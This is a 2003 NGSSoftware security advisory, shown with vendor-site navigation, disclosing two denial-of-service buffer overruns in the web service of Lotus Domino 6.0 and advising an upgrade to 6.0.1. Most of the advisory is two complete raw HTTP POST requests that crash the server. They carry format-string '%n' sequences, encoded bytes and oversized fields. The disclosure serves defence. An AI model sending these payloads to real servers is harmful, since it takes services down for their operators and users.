Advisories - Research - Next Generation Security Software

LOTUS DOMINO Denial Of Service Attacks 1 & 2

February 17th, 2003

NGSSoftware Insight Security Research Advisory

Name: LOTUS DOMINO Denial Of Service Attacks 1 & 2

Systems Affected: Release 6.0

Severity: Critical Risk

Category: Remote System Buffer Overrun

Vendor URL: http://www.lotus.com

Author: Mark Litchfield (mark@ngssoftware.com)

Date: 17th February 2003

Advisory number: #NISR17022003d

Description

***********

Lotus Domino and Notes together provide a featured enterprise collaboration system

with Domino providing application server services. Based on Netcrafts (www.netcraft.com)

Januray 2003 Server Survey, Lotus Domino is positioned 10th in the web server market

totaling 78,031.

Details

*******

There exists two areas in which a denial of service attack can be launched against the web

services of Lotus Domino (nhttp.exe). In both instances, the web services would be required

to be restarted by the domino administrator.

Attack 1 - Incomplete POST Request

POST /test2.nsf/($Journal)/$new/?EditDocument&Form=h_PageUI&PresetFields=s_NotesForm;JournalEntry HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,

application/vnd.ms-powerpoint, application/msword, */*

Referer: http://ngssoftware/test2.nsf/($Journal)/$new/?EditDocument&Form=h_PageUI&PresetFields=h_EditAction;

h_New,s_NotesForm;JournalEntry

Accept-Language: en-gb

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Host: ngssoftware

Content-Length: 8111

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: Shimmer=ui:I&DNIDate:20021212&CalIDate:20021212&AMActive:1&NMTLP:20021217T032503Z&NMCount:0&CalView:D;

iwaSSL=0

Bi%5D%3DSj%28this%5Bi%5D%2Cstr%29%3B+return+this%3B%7D%26%26%26putAway%5B%27Ib%27%5D%5B%27BPE%27%5D%26%26%26

function+%28name%29%7Bfor%28var+i%3D0%3Bi%3Cthis.length%3Bi%2B%2B%29+if%28this%5Bi%5D+%3D%3D+name%29+return+

true%3B+return+false%3B%7D%26%26%26putAway%5B%27Ib%27%5D%5B%27BSU%27%5D%26%26%26function+%28obj%29%7Bthis%5B

this.length%5D%3Dobj%3B%7D%26%26%26putAway%5B%27Ib%27%5D%5B%27BQV%27%5D%26%26%26function+%28fnEquals%29%7Bif

+%28%21fnEquals%29+fnEquals%3Dfunction%28s%2C+t%29%7Breturn+s%3D%3Dt%3B%7D%3B+for%28var+i%3D0%3B+i%3Cthis.

length%3B+i%2B%2B%29+if%28typeof+this%5Bi%5D+%3D%3D+%27string%27%29+this%5Bi%5D%3DSj%28this%5Bi%5D%29%3B+var

+i%3D0%3B+while%28i%3Cthis.length%29%7Bvar+s%3Dthis%5Bi%5D%3B+var+Ks%3Dfalse%3B+if%28s+%3D%3D+null+%7C%7C+s+

%3D%3D+%22%22%29+Ks%3Dtrue%3B+for%28var+j%3Di%2B1%3Bj%3Cthis.length%3Bj%2B%2B%29%7Bif%28fnEquals%28s%2C+this

%5Bj%5D%29%29+Ks%3Dtrue%3B%7Dif%28Ks%29%7Bthis.BNT%28i%29%3B+continue%3B%7Di%2B%2B%3B%7Dreturn+this%3B%7D%26

%26%26putAway%5B%27Ib%27%5D%5B%27addUnique%27%5D%26%26%26function%28vAdd%2C+fnCompare%29%7Bif%28this.indexOf

%28vAdd%2C+fnCompare%29+%3D%3D+-1%29+this%5Bthis.length%5D%3DvAdd%3B+return+this%3B%7D%26%26%26putAway%5B%27

Ib%27%5D%5B%27indexOf%27%5D%26%26%26function%28vSearch%2C+fnCompare%29%7Bfor%28var+i%3D0%3B+i+%3C+this.length

%3B+i%2B%2B%29%7Bif%28fnCompare%29%7Bif%28fnCompare%28this%5Bi%5D%2C+vSearch%29%29+return+i%3B%7Delse%7Bif%28

this%5Bi%5D+%3D%3D+vSearch%29+return+i%3B%7D%7Dreturn+-1%3B%7D%26%26%26putAway%5B%27Ib%27%5D%5B%27Ub%27%5D%2

6%26%26function%28start%2C+len%29%7Bfor+%28var+i%3Dstart%3B+i+%3C+start+%2B+len%3B+%2B%2Bi%29%7Bthis%5Bi%5D%

3Dthis%5Bi%2B1%5D%3B%7Dthis.length+-%3D+len%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%27BNT%27%5D%26

%26%26function+%28index%29%7Bvar+len%3Dthis.length%3B+if%28index+%3C+0+%7C%7C+%21%28index+%3C+len%29%29+return

%3B+for%28var+i%3Dindex%3Bi%3Clen-1%3Bi%2B%2B%29+this%5Bi%5D%3Dthis%5Bi%2B1%5D%3B+this.length+–%3B%7D%26%26

%26putAway%5B%27folderStorage%27%5D%5B%27BOY%27%5D%26%26%26function+%28aRemove%2CbDelAll%29%7Bfor%28var+k%3D

0%3Bk%3CaRemove.length%3Bk%2B%2B%29%7Bvar+name%3DaRemove%5Bk%5D%3B+for%28var+i%3Dthis.length-1%3Bi%3E%3D0%3B

i–%29+if%28this%5Bi%5D+%3D%3D+name%29%7Bfor%28var+j%3Di%3Bj%3C%3Dthis.length-2%3Bj%2B%2B%29+this%5Bj%5D%3D

this%5Bj%2B1%5D%3B+this.length+–%3B+if%28%21bDelAll%29+break%3B%7D%7Dreturn+this%3B%7D%26%26%26putAway%5B%2

7folderStorage%27%5D%5B%27dz%27%5D%26%26%26function+%28str%29%7Bfor%28var+i%3D0%3Bi%3Cthis.length%3Bi%2B%2B%

29+this%5Bi%5D%3DSj%28this%5Bi%5D%2Cstr%29%3B+return+this%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%

27BPE%27%5D%26%26%26function+%28name%29%7Bfor%28var+i%3D0%3Bi%3Cthis.length%3Bi%2B%2B%29+if%28this%5Bi%5D+%3

D%3D+name%29+return+true%3B+return+false%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%27BSU%27%5D%26%26

%26function+%28obj%29%7Bthis%5Bthis.length%5D%3Dobj%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%27BQV%

27%5D%26%26%26function+%28fnEquals%29%7Bif+%28%21fnEquals%29+fnEquals%3Dfunction%28s%2C+t%29%7Breturn+s%3D%3

Dt%3B%7D%3B+for%28var+i%3D0%3B+i%3Cthis.length%3B+i%2B%2B%29+if%28typeof+this%5Bi%5D+%3D%3D+%27string%27%29+

this%5Bi%5D%3DSj%28this%5Bi%5D%29%3B+var+i%3D0%3B+while%28i%3Cthis.length%29%7Bvar+s%3Dthis%5Bi%5D%3B+var+Ks

%3Dfalse%3B+if%28s+%3D%3D+null+%7C%7C+s+%3D%3D+%22%22%29+Ks%3Dtrue%3B+for%28var+j%3Di%2B1%3Bj%3Cthis.length%

3Bj%2B%2B%29%7Bif%28fnEquals%28s%2C+this%5Bj%5D%29%29+Ks%3Dtrue%3B%7Dif%28Ks%29%7Bthis.BNT%28i%29%3B+continue

%3B%7Di%2B%2B%3B%7Dreturn+this%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%27addUnique%27%5D%26%26%26

function%28vAdd%2C+fnCompare%29%7Bif%28this.indexOf%28vAdd%2C+fnCompare%29+%3D%3D+-1%29+this%5Bthis.length%5

D%3DvAdd%3B+return+this%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%27indexOf%27%5D%26%26%26function%2

8vSearch%2C+fnCompare%29%7Bfor%28var+i%3D0%3B+i+%3C+this.length%3B+i%2B%2B%29%7Bif%28fnCompare%29%7Bif%28fn

Compare%28this%5Bi%5D%2C+vSearch%29%29+return+i%3B%7Delse%7Bif%28this%5Bi%5D+%3D%3D+vSearch%29+return+i%3B%7D

%7Dreturn+-1%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%27Ub%27%5D%26%26%26function%28start2C+len%29%7

Bfor+%28var+i%3Dstart%3B+i+%3C+start+%2B+len%3B+%2B%2Bi%29%7Bthis%5Bi%5D%3Dthis%5Bi%2B1%5D%3B%7Dthis.length+-

%3D+len%3B%7D%26%26%26putAway%5B%27folderPageUnid%27%5D%5B%27BNT%27%5D%26%26%26function+%28index%29%7Bvar+len

%3Dthis.length%3B+if%28index+%3C+0+%7C%7C+%21%28index+%3C+len%29%29+return%3B+for%28var+i%3Dindex%3Bi%3Clen-1

%3Bi%2B%2B%29+this%5Bi%5D%3Dthis%5Bi%2B1%5D%3B+this.length+–%3B%7D%26%26%26putAway%5B%27folderPageUnid%27%5D

%5B%27BOY%27%5D%26%26%26function+%28aRemove%2CbDelAll%29%7Bfor%28var+k%3D0%3Bk%3CaRemove.length%3Bk%2B%2B%29%

7Bvar+name%3DaRemove%5Bk%5D%3B+for%28var+i%3Dthis.length-1%3Bi%3E%3D0%3Bi–%29+if%28this%5Bi%5D+%3D%3D+name%2

9%7Bfor%28var+j%3Di%3Bj%3C%3Dthis.length-2%3Bj%2B%2B%29+this%5Bj%5D%3Dthis%5Bj%2B1%5D%3B+this.length+–%3B+if

%28%21bDelAll%29+break%3B%7D%7Dreturn+this%3B%7D%26%26%26putAway%5B%27folderPageUnid%27%5D%5B%27dz%27%5D%26%2

6%26function+%28str%29%7Bfor%28var+i%3D0%3Bi%3Cthis.length%3Bi%2B%2B%29+this%5Bi%5D%3DSj%28this%5Bi%5D%2Cstr%

29%3B+return+this%3B%7D%26%26%26putAway%5B%27folderPageUnid%27%5D%5B%27BPE%27%5D%26%26%26function+%28name%29%

7Bfor%28var+i%3D0%3Bi%3Cthis.length%3Bi%2B%2B%29+if%28this%5Bi%5D+%3D%3D+name%29+return+true%3B+return+false%

3B%7D%26%26%26putAway%5B%27folderPageUnid%27%5D%5B%27BSU%27%5D%26%26%26function+%28obj%29%7Bthis%5Bthis.length

%5D%3Dobj%3B%7D%26%26%26putAway%5B%27folderPageUnid%27%5D%5B%27BQV%27%5D%26%26%26function+%28fnEquals%29%7Bif

+%28%21fnEquals%29+fnEquals%3Dfunction%28s%2C+t%29%7Breturn+s%3D%3Dt%3B%7D%3B+for%28var+i%3D0%3B+i%3Cthis.length

%3B+i%2B%2B%29+if%28typeof+this%5Bi%5D+%3D%3D+%27string%27%29+this%5Bi%5D%3DSj%28this%5Bi%5D%29%3B+var+i%3D0%

3B+while%28i%3Cthis.length%29%7Bvar+s%3Dthis%5Bi%5D%3B+var+Ks%3Dfalse%3B+if%28s+%3D%3D+null+%7C%7C+s+%3D%3D+%

22%22%29+Ks%3Dtrue%3B+for%28var+j%3Di%2B1%3Bj%3Cthis.length%3Bj%2B%2B%29%7Bif%28fnEquals%28s%2C+this%5Bj%5D%2

9%29+Ks%3Dtrue%3B%7Dif%28Ks%29%7Bthis.BNT%28i%29%3B+continue%3B%7Di%2B%2B%3B%7Dreturn+this%3B%7D%26%26%26putA

way%5B%27folderPageUnid%27%5D%5B%27addUnique%27%5D%26%26%26function%28vAdd%2C+fnCompare%29%7Bif%28this.indexO

f%28vAdd%2C+fnCompare%29+%3D%3D+-1%29+this%5Bthis.length%5D%3DvAdd%3B+return+this%3B%7D%26%26%26putAway%5B%27

folderPageUnid%27%5D%5B%27indexOf%27%5D%26%26%26function%28vSearch%2C+fnCompare%29%7Bfor%28var+i%3D0%3B+i+%3C

+this.length%3B+i%2B%2B%29%7Bif%28fnCompare%29%7Bif%28fnCompare%28this%5Bi%5D%2C+vSearch%29%29+return+i%3B%7D

else%7Bif%28this%5Bi%5D+%3D%3D+vSearch%29+return+i%3B%7D%7Dreturn+-1%3B%7D%26%26%26putAway%5B%27folderPageUni

d%27%5D%5B%27Ub%27%5D%26%26%26function%28start%2C+len%29%7Bfor+%28var+i%3Dstart%3B+i+%3C+start+%2B+len%3B+%2B

%2Bi%29%7Bthis%5Bi%5D%3Dthis%5Bi%2B1%5D%3B%7Dthis.length+-%3D+len%3B%7D%26%26%26putAway%5B%27selectedFolderIn

dex%27%5D%26%26%260%26%26%26putAway%5B%27BSi%27%5D%26%26%26%26%26%26&h_EditAction=h_Next&h_SetEditCurrentScen

e=s_StdPageEdit&h_SetPublishReaders=&h_AlternateName=&h_CurrentFolderDocument=&h_CurrentFolderName=&h_SetEdit

NextScene=h_StdPageEditImage&h_SetReturnURL=&h_ReturnToPage=&h_NoSceneTrail=0&h_SetCommand=h_ShimmerSave&h_Se

tSaveDoc=1&s_MailSendReturnPage=&s_MailViewBefore=&h_SetPublishToFolder=&h_Name=foobar&h_SetPublishAction=&h_

EditSceneTrail=&h_WorkflowStage=&h_IsConflict=&h_DictionaryId=&From=Anonymous&Principal=Anonymous%25n%25n%25n

%25n%25n&Form=JournalEntry&Subject=foobar&Categories=testcat&h_RichTextItem=Body&Body=%3Cdiv%3Eghhgh%3CSPAN%3

E%3C%2FSPAN%3E%3C%2Fdiv%3E&h_CurrentPosition=40%2501%25u0103%2514%2501%2501%2501%2501%2501%2503%2501%2503%250

1%2501%2501%2501%2501%250C%2501%2506ihiih%25uE7F9%25u019F%25uE7F5%25u019F%25u9021%25u637F%25uAE47%25u6359%25u

AE5C%25u6359%25u9021%25u637F%2511%2501%2503%2501&h_ImageURL=&h_HeadlineText=&h_ImageCount=0&h_NewImageCount=0

&h_HeadlineCount=0&h_LinkURL=&h_LinkTitle=&h_PageText=&s_ImageUseCidRef=&s_EmbeddedImageInfo=&s_CidImageInfo=

&s_ConvertImage=0&FontNames=3&FontSize=2&HaikuEditorPlainTextArea=&s_UsePlainText=0&s_PlainEditor=0&h_Attachm

entTimes=&h_AttachmentNamesAlt=&h_AttachmentLengthsAlt=&h_AttachmentOldNames=

Attack 2

Fictionary Value Field POST request

POST /test2.nsf/iNotes/Proxy/?EditDocument&Form=s_Validation&PresetFields=s_ValId;MailPreferenceEdit HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*

Referer: http://192.168.0.1/test2.nsf/iNotes/$new/?EditDocument&Form=h_PageUI&PresetFields=h_EditAction;h_New,

s_NotesForm;ShimmerMailPref

Accept-Language: en-gb

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; (R1 1.3); .NET CLR 1.0.3705)

Host: 192.168.0.1

Content-Length: 2548

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: Shimmer=DNIDate:20030114&CalIDate:20030114&NMTLP:20030114T191749Z&NMCount:0&SI_TLM:20030115T020722%2C4

0Z&MOFolder:%28%24Drafts%29&MOFolderLabel:Drafts&MOTLM:20030115T000509%2C10Z&ui:I; iwaSSL=0

%25%25PostCharset=ISO-8859-1&&EXCLUDEFROMVIEW=null&s_BrowserSuffix=mybrowser&h_CurrentSkinName=me&h_CurrentSki

nType=myskin&s_UNH=%n%n%n%n%n%n%n&s_UNH=abcdefg&s_UNH=qwerty&VAL_ExpandGroup=0&VAL_Type=1&VAL_Exhaustive=1&VAL

_DoConflictCheck=1&VAL_UNID=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBB&VAL_Invitees=CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC&VAL_Dat

eTimeList=DDDDDDDDDDDDDDDDDDDDDDDDDDD&Data=liberty&AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAA=washere

Fix Information

***************

IBM Lotus Notes and Domino Release 6.0.1 is currently available being marketed as the first maintenance release.

It goes on to say if customers haven’t already upgraded or migrated to Notes and Domino 6, now is the time to

move and start reaping the benefits of this existing and highly praised release. Release 6.0.1 includes fixes

to enhance the quality and reliability of the Notes and Domino 6 products. It does not however mention any

security issues, and NGS would strongly advise to upgrade as soon as possible not to reap the benefits but to

secure yourself and your data against possible web based or network attacks.

The upgrade / patch can be obtained from http://www14.software.ibm.com/webapp/download/search.jsp?q=&cat=&pf=&k

=&dt=&go=y&rs=ESD-NOTECLNTi&S_TACT=&S_CMP=&sb=r

A check for these issues has been added to DominoScan R2, a comprehensive automated intelligent assessment tool

for Lotus Domino Servers of which more information is available from the

NGSSoftware website, http://www.ngssoftware.com/software/dominoscan.html

Further Information

*******************

For further information about the scope and effects of buffer overflows, please see

http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf

http://www.ngssoftware.com/papers/ntbufferoverflow.html

http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf

http://www.ngssoftware.com/papers/unicodebo.pdf

Main Navigation

Toolbar links

Site Search

LOTUS DOMINO Denial Of Service Attacks 1 & 2

Section Navigation

SC Awards 2008

ITA 2008

SLBA 2008

Testing & Assessment

Database Security

Latest Vacancies

Experienced CLAS consultant

NGS Offices

NGS Consulting

NGS Security Training

Speaking Events

OWASP AppSec Europe 2008

AusCERT 2008

ITWeb Security Summit

Customer Testimonials

NGS Publications

Web Application Hacker's Handbook

Oracle Hacker's Handbook

Database Hacker's Handbook

The Shellcoder's Handbook

SQL Server Security

Configuring IPCop Firewalls